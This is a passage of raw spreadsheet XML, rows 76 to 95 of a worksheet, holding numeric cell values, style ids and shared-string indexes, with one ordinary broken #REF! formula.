      <c r="AE76" s="14"/>
      <c r="AF76" s="14"/>
    </row>
    <row r="77">
      <c r="A77" s="6">
        <f t="shared" si="1"/>
        <v>0.3802162567</v>
      </c>
      <c r="B77" s="29">
        <v>1.0</v>
      </c>
      <c r="C77" s="15"/>
      <c r="D77" s="14"/>
      <c r="E77" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F77" s="14"/>
      <c r="G77" s="29">
        <v>3.0</v>
      </c>
      <c r="H77" s="29">
        <v>412.0</v>
      </c>
      <c r="I77" s="29">
        <v>59811.0</v>
      </c>
      <c r="J77" s="15"/>
      <c r="K77" s="29">
        <v>-1.0</v>
      </c>
      <c r="L77" s="15"/>
      <c r="M77" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N77" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O77" s="29">
        <v>1.0</v>
      </c>
      <c r="P77" s="29">
        <v>3.0</v>
      </c>
      <c r="Q77" s="15"/>
      <c r="R77" s="15"/>
      <c r="S77" s="15"/>
      <c r="T77" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U77" s="5" t="s">
        <v>1289</v>
      </c>
      <c r="V77" s="5" t="s">
        <v>1074</v>
      </c>
      <c r="W77" s="41" t="s">
        <v>245</v>
      </c>
      <c r="X77" s="37" t="s">
        <v>1289</v>
      </c>
      <c r="Y77" s="37" t="s">
        <v>1350</v>
      </c>
      <c r="Z77" s="38" t="s">
        <v>1351</v>
      </c>
      <c r="AA77" s="39" t="s">
        <v>1352</v>
      </c>
      <c r="AB77" s="38" t="s">
        <v>1353</v>
      </c>
      <c r="AC77" s="40">
        <v>95416.0</v>
      </c>
      <c r="AD77" s="5"/>
      <c r="AE77" s="14"/>
      <c r="AF77" s="14"/>
    </row>
    <row r="78">
      <c r="A78" s="6">
        <f t="shared" si="1"/>
        <v>0.5487358008</v>
      </c>
      <c r="B78" s="29">
        <v>1.0</v>
      </c>
      <c r="C78" s="15"/>
      <c r="D78" s="14"/>
      <c r="E78" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F78" s="14"/>
      <c r="G78" s="29">
        <v>1.0</v>
      </c>
      <c r="H78" s="29">
        <v>3046.0</v>
      </c>
      <c r="I78" s="29">
        <v>93104.0</v>
      </c>
      <c r="J78" s="15"/>
      <c r="K78" s="29">
        <v>-1.0</v>
      </c>
      <c r="L78" s="15"/>
      <c r="M78" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N78" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O78" s="29">
        <v>2.0</v>
      </c>
      <c r="P78" s="29">
        <v>3.0</v>
      </c>
      <c r="Q78" s="15"/>
      <c r="R78" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S78" s="15"/>
      <c r="T78" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U78" s="5" t="s">
        <v>1289</v>
      </c>
      <c r="V78" s="5" t="s">
        <v>1074</v>
      </c>
      <c r="W78" s="41" t="s">
        <v>113</v>
      </c>
      <c r="X78" s="18" t="s">
        <v>1289</v>
      </c>
      <c r="Y78" s="18" t="s">
        <v>1354</v>
      </c>
      <c r="Z78" s="38" t="s">
        <v>1355</v>
      </c>
      <c r="AA78" s="39" t="s">
        <v>1356</v>
      </c>
      <c r="AB78" s="38" t="s">
        <v>1357</v>
      </c>
      <c r="AC78" s="40">
        <v>106681.0</v>
      </c>
      <c r="AD78" s="5"/>
      <c r="AE78" s="14"/>
      <c r="AF78" s="14"/>
    </row>
    <row r="79">
      <c r="A79" s="6">
        <f t="shared" si="1"/>
        <v>0.8398086625</v>
      </c>
      <c r="B79" s="29">
        <v>1.0</v>
      </c>
      <c r="C79" s="15"/>
      <c r="D79" s="14"/>
      <c r="E79" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F79" s="14"/>
      <c r="G79" s="29">
        <v>1.0</v>
      </c>
      <c r="H79" s="29">
        <v>45.0</v>
      </c>
      <c r="I79" s="29">
        <v>252304.0</v>
      </c>
      <c r="J79" s="15"/>
      <c r="K79" s="29">
        <v>6253.0</v>
      </c>
      <c r="L79" s="15"/>
      <c r="M79" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N79" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O79" s="29">
        <v>0.0</v>
      </c>
      <c r="P79" s="29">
        <v>5.0</v>
      </c>
      <c r="Q79" s="15"/>
      <c r="R79" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S79" s="15"/>
      <c r="T79" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U79" s="5" t="s">
        <v>1289</v>
      </c>
      <c r="V79" s="5" t="s">
        <v>173</v>
      </c>
      <c r="W79" s="37" t="s">
        <v>1289</v>
      </c>
      <c r="X79" s="37" t="s">
        <v>245</v>
      </c>
      <c r="Y79" s="37" t="s">
        <v>1358</v>
      </c>
      <c r="Z79" s="38" t="s">
        <v>1359</v>
      </c>
      <c r="AA79" s="39" t="s">
        <v>1360</v>
      </c>
      <c r="AB79" s="38" t="s">
        <v>395</v>
      </c>
      <c r="AC79" s="40">
        <v>245749.0</v>
      </c>
      <c r="AD79" s="5"/>
      <c r="AE79" s="14"/>
      <c r="AF79" s="14"/>
    </row>
    <row r="80">
      <c r="A80" s="6">
        <f t="shared" si="1"/>
        <v>0.7148480862</v>
      </c>
      <c r="B80" s="29">
        <v>1.0</v>
      </c>
      <c r="C80" s="15"/>
      <c r="D80" s="14"/>
      <c r="E80" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F80" s="14"/>
      <c r="G80" s="29">
        <v>0.0</v>
      </c>
      <c r="H80" s="29">
        <v>339.0</v>
      </c>
      <c r="I80" s="29">
        <v>249280.0</v>
      </c>
      <c r="J80" s="15"/>
      <c r="K80" s="29">
        <v>91193.0</v>
      </c>
      <c r="L80" s="15"/>
      <c r="M80" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N80" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O80" s="29">
        <v>2.0</v>
      </c>
      <c r="P80" s="29">
        <v>1.0</v>
      </c>
      <c r="Q80" s="15"/>
      <c r="R80" s="15"/>
      <c r="S80" s="15"/>
      <c r="T80" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U80" s="18" t="s">
        <v>1289</v>
      </c>
      <c r="V80" s="5" t="s">
        <v>1074</v>
      </c>
      <c r="W80" s="41" t="s">
        <v>245</v>
      </c>
      <c r="X80" s="18" t="s">
        <v>1289</v>
      </c>
      <c r="Y80" s="18" t="s">
        <v>1341</v>
      </c>
      <c r="Z80" s="38" t="s">
        <v>1361</v>
      </c>
      <c r="AA80" s="39" t="s">
        <v>1362</v>
      </c>
      <c r="AB80" s="38" t="s">
        <v>1363</v>
      </c>
      <c r="AC80" s="40">
        <v>243468.0</v>
      </c>
      <c r="AD80" s="5"/>
      <c r="AE80" s="14"/>
      <c r="AF80" s="14"/>
    </row>
    <row r="81">
      <c r="A81" s="6">
        <f t="shared" si="1"/>
        <v>0.1661091976</v>
      </c>
      <c r="B81" s="29">
        <v>1.0</v>
      </c>
      <c r="C81" s="29">
        <v>176942.0</v>
      </c>
      <c r="D81" s="14"/>
      <c r="E81" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F81" s="14"/>
      <c r="G81" s="29">
        <v>1.0</v>
      </c>
      <c r="H81" s="29">
        <v>159.0</v>
      </c>
      <c r="I81" s="29">
        <v>27533.0</v>
      </c>
      <c r="J81" s="15"/>
      <c r="K81" s="15"/>
      <c r="L81" s="15"/>
      <c r="M81" s="15"/>
      <c r="N81" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O81" s="29">
        <v>2.0</v>
      </c>
      <c r="P81" s="29">
        <v>0.0</v>
      </c>
      <c r="Q81" s="15"/>
      <c r="R81" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S81" s="15"/>
      <c r="T81" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U81" s="5" t="s">
        <v>1289</v>
      </c>
      <c r="V81" s="5" t="s">
        <v>1289</v>
      </c>
      <c r="W81" s="41" t="s">
        <v>245</v>
      </c>
      <c r="X81" s="18" t="s">
        <v>185</v>
      </c>
      <c r="Y81" s="45"/>
      <c r="Z81" s="38" t="s">
        <v>1364</v>
      </c>
      <c r="AA81" s="39" t="s">
        <v>1365</v>
      </c>
      <c r="AB81" s="38" t="s">
        <v>1366</v>
      </c>
      <c r="AC81" s="40">
        <v>176921.0</v>
      </c>
      <c r="AD81" s="5"/>
      <c r="AE81" s="14"/>
      <c r="AF81" s="14"/>
    </row>
    <row r="82">
      <c r="A82" s="6">
        <f t="shared" si="1"/>
        <v>0.2704363024</v>
      </c>
      <c r="B82" s="29">
        <v>1.0</v>
      </c>
      <c r="C82" s="29">
        <v>80479.0</v>
      </c>
      <c r="D82" s="14"/>
      <c r="E82" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F82" s="14"/>
      <c r="G82" s="29">
        <v>6.0</v>
      </c>
      <c r="H82" s="29">
        <v>386.0</v>
      </c>
      <c r="I82" s="29">
        <v>40538.0</v>
      </c>
      <c r="J82" s="15"/>
      <c r="K82" s="29">
        <v>40538.0</v>
      </c>
      <c r="L82" s="15"/>
      <c r="M82" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N82" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O82" s="29">
        <v>2.0</v>
      </c>
      <c r="P82" s="29">
        <v>3.0</v>
      </c>
      <c r="Q82" s="15"/>
      <c r="R82" s="15"/>
      <c r="S82" s="15"/>
      <c r="T82" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U82" s="46" t="str">
        <f>sum(#REF!)</f>
        <v>#REF!</v>
      </c>
      <c r="V82" s="5"/>
      <c r="W82" s="45"/>
      <c r="X82" s="45"/>
      <c r="Y82" s="45"/>
      <c r="Z82" s="38" t="s">
        <v>1367</v>
      </c>
      <c r="AA82" s="39" t="s">
        <v>1368</v>
      </c>
      <c r="AB82" s="38" t="s">
        <v>1369</v>
      </c>
      <c r="AC82" s="40">
        <v>80439.0</v>
      </c>
      <c r="AD82" s="5"/>
      <c r="AE82" s="14"/>
      <c r="AF82" s="14"/>
    </row>
    <row r="83">
      <c r="A83" s="6">
        <f t="shared" si="1"/>
        <v>0.2619896646</v>
      </c>
      <c r="B83" s="29">
        <v>1.0</v>
      </c>
      <c r="C83" s="15"/>
      <c r="D83" s="14"/>
      <c r="E83" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F83" s="14"/>
      <c r="G83" s="29">
        <v>2.0</v>
      </c>
      <c r="H83" s="29">
        <v>332.0</v>
      </c>
      <c r="I83" s="15"/>
      <c r="J83" s="5" t="s">
        <v>1370</v>
      </c>
      <c r="K83" s="15"/>
      <c r="L83" s="5" t="s">
        <v>1370</v>
      </c>
      <c r="M83" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N83" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O83" s="29">
        <v>0.0</v>
      </c>
      <c r="P83" s="29">
        <v>5.0</v>
      </c>
      <c r="Q83" s="15"/>
      <c r="R83" s="15"/>
      <c r="S83" s="15"/>
      <c r="T83" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U83" s="5"/>
      <c r="V83" s="5"/>
      <c r="W83" s="47"/>
      <c r="X83" s="45"/>
      <c r="Y83" s="45"/>
      <c r="Z83" s="38" t="s">
        <v>1371</v>
      </c>
      <c r="AA83" s="39" t="s">
        <v>1372</v>
      </c>
      <c r="AB83" s="38" t="s">
        <v>1373</v>
      </c>
      <c r="AC83" s="40">
        <v>62540.0</v>
      </c>
      <c r="AD83" s="5"/>
      <c r="AE83" s="14"/>
      <c r="AF83" s="14"/>
    </row>
    <row r="84">
      <c r="A84" s="6">
        <f t="shared" si="1"/>
        <v>0.7612599181</v>
      </c>
      <c r="B84" s="29">
        <v>1.0</v>
      </c>
      <c r="C84" s="15"/>
      <c r="D84" s="14"/>
      <c r="E84" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F84" s="14"/>
      <c r="G84" s="29">
        <v>0.0</v>
      </c>
      <c r="H84" s="29">
        <v>1296.0</v>
      </c>
      <c r="I84" s="29">
        <v>151099.0</v>
      </c>
      <c r="J84" s="15"/>
      <c r="K84" s="29">
        <v>151099.0</v>
      </c>
      <c r="L84" s="15"/>
      <c r="M84" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N84" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O84" s="29">
        <v>2.0</v>
      </c>
      <c r="P84" s="29">
        <v>4.0</v>
      </c>
      <c r="Q84" s="15"/>
      <c r="R84" s="15"/>
      <c r="S84" s="15"/>
      <c r="T84" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U84" s="5"/>
      <c r="V84" s="5"/>
      <c r="W84" s="47"/>
      <c r="X84" s="45"/>
      <c r="Y84" s="45"/>
      <c r="Z84" s="38" t="s">
        <v>1374</v>
      </c>
      <c r="AA84" s="39" t="s">
        <v>1375</v>
      </c>
      <c r="AB84" s="38" t="s">
        <v>1376</v>
      </c>
      <c r="AC84" s="40">
        <v>162070.0</v>
      </c>
      <c r="AD84" s="5"/>
      <c r="AE84" s="14"/>
      <c r="AF84" s="14"/>
    </row>
    <row r="85">
      <c r="A85" s="6">
        <f t="shared" si="1"/>
        <v>0.2073922469</v>
      </c>
      <c r="B85" s="29">
        <v>1.0</v>
      </c>
      <c r="C85" s="14"/>
      <c r="D85" s="14"/>
      <c r="E85" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F85" s="14"/>
      <c r="G85" s="29">
        <v>35.0</v>
      </c>
      <c r="H85" s="29">
        <v>5445.0</v>
      </c>
      <c r="I85" s="29">
        <v>248320.0</v>
      </c>
      <c r="J85" s="15"/>
      <c r="K85" s="29">
        <v>248320.0</v>
      </c>
      <c r="L85" s="14"/>
      <c r="M85" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N85" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O85" s="29">
        <v>6.0</v>
      </c>
      <c r="P85" s="29">
        <v>6.0</v>
      </c>
      <c r="Q85" s="15"/>
      <c r="R85" s="15"/>
      <c r="S85" s="15"/>
      <c r="T85" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U85" s="5"/>
      <c r="V85" s="5"/>
      <c r="W85" s="47"/>
      <c r="X85" s="45"/>
      <c r="Y85" s="45"/>
      <c r="Z85" s="38" t="s">
        <v>1377</v>
      </c>
      <c r="AA85" s="39" t="s">
        <v>1378</v>
      </c>
      <c r="AB85" s="38" t="s">
        <v>1379</v>
      </c>
      <c r="AC85" s="40">
        <v>244663.0</v>
      </c>
      <c r="AD85" s="5"/>
      <c r="AE85" s="14"/>
      <c r="AF85" s="14"/>
    </row>
    <row r="86">
      <c r="A86" s="6">
        <f t="shared" si="1"/>
        <v>0.02239799848</v>
      </c>
      <c r="B86" s="29">
        <v>1.0</v>
      </c>
      <c r="C86" s="29">
        <v>178775.0</v>
      </c>
      <c r="D86" s="14"/>
      <c r="E86" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F86" s="14"/>
      <c r="G86" s="29">
        <v>1.0</v>
      </c>
      <c r="H86" s="29">
        <v>19706.0</v>
      </c>
      <c r="I86" s="29">
        <v>122309.0</v>
      </c>
      <c r="J86" s="15"/>
      <c r="K86" s="15"/>
      <c r="L86" s="15"/>
      <c r="M86" s="15"/>
      <c r="N86" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O86" s="29">
        <v>2.0</v>
      </c>
      <c r="P86" s="29">
        <v>2.0</v>
      </c>
      <c r="Q86" s="15"/>
      <c r="R86" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S86" s="15"/>
      <c r="T86" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U86" s="5"/>
      <c r="V86" s="5"/>
      <c r="W86" s="47"/>
      <c r="X86" s="45"/>
      <c r="Y86" s="45"/>
      <c r="Z86" s="38" t="s">
        <v>1380</v>
      </c>
      <c r="AA86" s="39" t="s">
        <v>1381</v>
      </c>
      <c r="AB86" s="38" t="s">
        <v>1382</v>
      </c>
      <c r="AC86" s="40">
        <v>178772.0</v>
      </c>
      <c r="AD86" s="5"/>
      <c r="AE86" s="14"/>
      <c r="AF86" s="14"/>
    </row>
    <row r="87">
      <c r="A87" s="6">
        <f t="shared" si="1"/>
        <v>0.7258804501</v>
      </c>
      <c r="B87" s="29">
        <v>1.0</v>
      </c>
      <c r="C87" s="14"/>
      <c r="D87" s="14"/>
      <c r="E87" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F87" s="14"/>
      <c r="G87" s="29">
        <v>-1.0</v>
      </c>
      <c r="H87" s="29">
        <v>235.0</v>
      </c>
      <c r="I87" s="29">
        <v>127944.0</v>
      </c>
      <c r="J87" s="15"/>
      <c r="K87" s="15"/>
      <c r="L87" s="15"/>
      <c r="M87" s="15"/>
      <c r="N87" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O87" s="29">
        <v>1.0</v>
      </c>
      <c r="P87" s="29">
        <v>1.0</v>
      </c>
      <c r="Q87" s="15"/>
      <c r="R87" s="15"/>
      <c r="S87" s="15"/>
      <c r="T87" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U87" s="5"/>
      <c r="V87" s="5"/>
      <c r="W87" s="47"/>
      <c r="X87" s="45"/>
      <c r="Y87" s="45"/>
      <c r="Z87" s="38" t="s">
        <v>1383</v>
      </c>
      <c r="AA87" s="39" t="s">
        <v>1384</v>
      </c>
      <c r="AB87" s="38" t="s">
        <v>1385</v>
      </c>
      <c r="AC87" s="40">
        <v>147900.0</v>
      </c>
      <c r="AD87" s="5"/>
      <c r="AE87" s="14"/>
      <c r="AF87" s="14"/>
    </row>
    <row r="88">
      <c r="A88" s="6">
        <f t="shared" si="1"/>
        <v>0.2924621867</v>
      </c>
      <c r="B88" s="29">
        <v>1.0</v>
      </c>
      <c r="C88" s="29">
        <v>181337.0</v>
      </c>
      <c r="D88" s="14"/>
      <c r="E88" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F88" s="14"/>
      <c r="G88" s="29">
        <v>141.0</v>
      </c>
      <c r="H88" s="29">
        <v>27574.0</v>
      </c>
      <c r="I88" s="29">
        <v>26065.0</v>
      </c>
      <c r="J88" s="15"/>
      <c r="K88" s="29">
        <v>89785.0</v>
      </c>
      <c r="L88" s="15"/>
      <c r="M88" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N88" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O88" s="29">
        <v>3.0</v>
      </c>
      <c r="P88" s="29">
        <v>13.0</v>
      </c>
      <c r="Q88" s="15"/>
      <c r="R88" s="15"/>
      <c r="S88" s="15"/>
      <c r="T88" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U88" s="5"/>
      <c r="V88" s="5"/>
      <c r="W88" s="47"/>
      <c r="X88" s="45"/>
      <c r="Y88" s="45"/>
      <c r="Z88" s="38" t="s">
        <v>1386</v>
      </c>
      <c r="AA88" s="39" t="s">
        <v>1387</v>
      </c>
      <c r="AB88" s="38" t="s">
        <v>1388</v>
      </c>
      <c r="AC88" s="40">
        <v>181328.0</v>
      </c>
      <c r="AD88" s="5"/>
      <c r="AE88" s="14"/>
      <c r="AF88" s="14"/>
    </row>
    <row r="89">
      <c r="A89" s="6">
        <f t="shared" si="1"/>
        <v>0.9275136142</v>
      </c>
      <c r="B89" s="29">
        <v>1.0</v>
      </c>
      <c r="C89" s="29">
        <v>192183.0</v>
      </c>
      <c r="D89" s="14"/>
      <c r="E89" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F89" s="14"/>
      <c r="G89" s="29">
        <v>7.0</v>
      </c>
      <c r="H89" s="29">
        <v>1406.0</v>
      </c>
      <c r="I89" s="29">
        <v>184923.0</v>
      </c>
      <c r="J89" s="15"/>
      <c r="K89" s="29">
        <v>184923.0</v>
      </c>
      <c r="L89" s="15"/>
      <c r="M89" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N89" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O89" s="29">
        <v>2.0</v>
      </c>
      <c r="P89" s="29">
        <v>6.0</v>
      </c>
      <c r="Q89" s="15"/>
      <c r="R89" s="15"/>
      <c r="S89" s="15"/>
      <c r="T89" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U89" s="5"/>
      <c r="V89" s="5"/>
      <c r="W89" s="47"/>
      <c r="X89" s="45"/>
      <c r="Y89" s="45"/>
      <c r="Z89" s="38" t="s">
        <v>1389</v>
      </c>
      <c r="AA89" s="39" t="s">
        <v>1390</v>
      </c>
      <c r="AB89" s="38" t="s">
        <v>1391</v>
      </c>
      <c r="AC89" s="40">
        <v>192182.0</v>
      </c>
      <c r="AD89" s="5"/>
      <c r="AE89" s="14"/>
      <c r="AF89" s="14"/>
    </row>
    <row r="90">
      <c r="A90" s="6">
        <f t="shared" si="1"/>
        <v>0.3238786912</v>
      </c>
      <c r="B90" s="29">
        <v>1.0</v>
      </c>
      <c r="C90" s="29">
        <v>203857.0</v>
      </c>
      <c r="D90" s="14"/>
      <c r="E90" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F90" s="14"/>
      <c r="G90" s="29">
        <v>0.0</v>
      </c>
      <c r="H90" s="29">
        <v>511.0</v>
      </c>
      <c r="I90" s="29">
        <v>158452.0</v>
      </c>
      <c r="J90" s="15"/>
      <c r="K90" s="29">
        <v>6253.0</v>
      </c>
      <c r="L90" s="15"/>
      <c r="M90" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N90" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O90" s="29">
        <v>1.0</v>
      </c>
      <c r="P90" s="29">
        <v>2.0</v>
      </c>
      <c r="Q90" s="15"/>
      <c r="R90" s="15"/>
      <c r="S90" s="15"/>
      <c r="T90" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U90" s="5"/>
      <c r="V90" s="5"/>
      <c r="W90" s="47"/>
      <c r="X90" s="18"/>
      <c r="Y90" s="18"/>
      <c r="Z90" s="38" t="s">
        <v>1392</v>
      </c>
      <c r="AA90" s="39" t="s">
        <v>1393</v>
      </c>
      <c r="AB90" s="38" t="s">
        <v>1394</v>
      </c>
      <c r="AC90" s="40">
        <v>203845.0</v>
      </c>
      <c r="AD90" s="5"/>
      <c r="AE90" s="14"/>
      <c r="AF90" s="14"/>
    </row>
    <row r="91">
      <c r="A91" s="6">
        <f t="shared" si="1"/>
        <v>0.9189571613</v>
      </c>
      <c r="B91" s="29">
        <v>1.0</v>
      </c>
      <c r="C91" s="14"/>
      <c r="D91" s="14"/>
      <c r="E91" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F91" s="14"/>
      <c r="G91" s="29">
        <v>-1.0</v>
      </c>
      <c r="H91" s="29">
        <v>158.0</v>
      </c>
      <c r="I91" s="29">
        <v>103992.0</v>
      </c>
      <c r="J91" s="15"/>
      <c r="K91" s="29">
        <v>59228.0</v>
      </c>
      <c r="L91" s="15"/>
      <c r="M91" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N91" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O91" s="29">
        <v>1.0</v>
      </c>
      <c r="P91" s="29">
        <v>6.0</v>
      </c>
      <c r="Q91" s="15"/>
      <c r="R91" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S91" s="15"/>
      <c r="T91" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U91" s="5"/>
      <c r="V91" s="5"/>
      <c r="W91" s="47"/>
      <c r="X91" s="45"/>
      <c r="Y91" s="45"/>
      <c r="Z91" s="38" t="s">
        <v>1395</v>
      </c>
      <c r="AA91" s="39" t="s">
        <v>1396</v>
      </c>
      <c r="AB91" s="38" t="s">
        <v>1397</v>
      </c>
      <c r="AC91" s="40">
        <v>117036.0</v>
      </c>
      <c r="AD91" s="5"/>
      <c r="AE91" s="14"/>
      <c r="AF91" s="14"/>
    </row>
    <row r="92">
      <c r="A92" s="6">
        <f t="shared" si="1"/>
        <v>0.7699950485</v>
      </c>
      <c r="B92" s="29">
        <v>1.0</v>
      </c>
      <c r="C92" s="29">
        <v>7171.0</v>
      </c>
      <c r="D92" s="14"/>
      <c r="E92" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F92" s="14"/>
      <c r="G92" s="29">
        <v>2.0</v>
      </c>
      <c r="H92" s="29">
        <v>2593.0</v>
      </c>
      <c r="I92" s="29">
        <v>4910.0</v>
      </c>
      <c r="J92" s="15"/>
      <c r="K92" s="29">
        <v>4910.0</v>
      </c>
      <c r="L92" s="15"/>
      <c r="M92" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N92" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O92" s="29">
        <v>1.0</v>
      </c>
      <c r="P92" s="29">
        <v>5.0</v>
      </c>
      <c r="Q92" s="15"/>
      <c r="R92" s="15"/>
      <c r="S92" s="15"/>
      <c r="T92" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U92" s="5"/>
      <c r="V92" s="5"/>
      <c r="W92" s="47"/>
      <c r="X92" s="45"/>
      <c r="Y92" s="45"/>
      <c r="Z92" s="38" t="s">
        <v>1398</v>
      </c>
      <c r="AA92" s="39" t="s">
        <v>1399</v>
      </c>
      <c r="AB92" s="38" t="s">
        <v>1400</v>
      </c>
      <c r="AC92" s="40">
        <v>7141.0</v>
      </c>
      <c r="AD92" s="5"/>
      <c r="AE92" s="14"/>
      <c r="AF92" s="14"/>
    </row>
    <row r="93">
      <c r="A93" s="6">
        <f t="shared" si="1"/>
        <v>0.9961951854</v>
      </c>
      <c r="B93" s="29">
        <v>1.0</v>
      </c>
      <c r="C93" s="29">
        <v>173316.0</v>
      </c>
      <c r="D93" s="14"/>
      <c r="E93" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F93" s="14"/>
      <c r="G93" s="29">
        <v>2.0</v>
      </c>
      <c r="H93" s="29">
        <v>192.0</v>
      </c>
      <c r="I93" s="29">
        <v>58613.0</v>
      </c>
      <c r="J93" s="15"/>
      <c r="K93" s="29">
        <v>58613.0</v>
      </c>
      <c r="L93" s="15"/>
      <c r="M93" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N93" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O93" s="29">
        <v>1.0</v>
      </c>
      <c r="P93" s="29">
        <v>5.0</v>
      </c>
      <c r="Q93" s="15"/>
      <c r="R93" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S93" s="15"/>
      <c r="T93" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U93" s="5"/>
      <c r="V93" s="5"/>
      <c r="W93" s="47"/>
      <c r="X93" s="45"/>
      <c r="Y93" s="45"/>
      <c r="Z93" s="38" t="s">
        <v>1401</v>
      </c>
      <c r="AA93" s="39" t="s">
        <v>1402</v>
      </c>
      <c r="AB93" s="38" t="s">
        <v>1403</v>
      </c>
      <c r="AC93" s="40">
        <v>173215.0</v>
      </c>
      <c r="AD93" s="5"/>
      <c r="AE93" s="14"/>
      <c r="AF93" s="14"/>
    </row>
    <row r="94">
      <c r="A94" s="6">
        <f t="shared" si="1"/>
        <v>0.8010064293</v>
      </c>
      <c r="B94" s="29">
        <v>1.0</v>
      </c>
      <c r="C94" s="29">
        <v>161445.0</v>
      </c>
      <c r="D94" s="14"/>
      <c r="E94" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F94" s="14"/>
      <c r="G94" s="29">
        <v>99.0</v>
      </c>
      <c r="H94" s="29">
        <v>17165.0</v>
      </c>
      <c r="I94" s="29">
        <v>83641.0</v>
      </c>
      <c r="J94" s="15"/>
      <c r="K94" s="29">
        <v>7004.0</v>
      </c>
      <c r="L94" s="15"/>
      <c r="M94" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N94" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O94" s="29">
        <v>7.0</v>
      </c>
      <c r="P94" s="29">
        <v>18.0</v>
      </c>
      <c r="Q94" s="15"/>
      <c r="R94" s="15"/>
      <c r="S94" s="15"/>
      <c r="T94" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U94" s="5"/>
      <c r="V94" s="5"/>
      <c r="W94" s="47"/>
      <c r="X94" s="45"/>
      <c r="Y94" s="45"/>
      <c r="Z94" s="38" t="s">
        <v>1404</v>
      </c>
      <c r="AA94" s="39" t="s">
        <v>1405</v>
      </c>
      <c r="AB94" s="38" t="s">
        <v>1406</v>
      </c>
      <c r="AC94" s="40">
        <v>161403.0</v>
      </c>
      <c r="AD94" s="5"/>
      <c r="AE94" s="14"/>
      <c r="AF94" s="14"/>
    </row>
    <row r="95">
      <c r="A95" s="6">
        <f t="shared" si="1"/>
        <v>0.984336621</v>
      </c>
      <c r="B95" s="29">
        <v>1.0</v>
      </c>
      <c r="C95" s="29">
        <v>197506.0</v>
      </c>
      <c r="D95" s="14"/>
      <c r="E95" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F95" s="14"/>
      <c r="G95" s="29">
        <v>0.0</v>
      </c>
      <c r="H95" s="29">
        <v>170.0</v>
      </c>
      <c r="I95" s="29">
        <v>137176.0</v>
      </c>
      <c r="J95" s="15"/>
      <c r="K95" s="29">
        <v>137176.0</v>
      </c>
      <c r="L95" s="15"/>
      <c r="M95" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N95" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O95" s="29">
        <v>1.0</v>
      </c>
      <c r="P95" s="29">
        <v>7.0</v>
      </c>
      <c r="Q95" s="15"/>
      <c r="R95" s="15"/>
      <c r="S95" s="15"/>
      <c r="T95" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U95" s="5"/>
      <c r="V95" s="5"/>
      <c r="W95" s="47"/>
      <c r="X95" s="45"/>
      <c r="Y95" s="45"/>
      <c r="Z95" s="38" t="s">
        <v>1407</v>
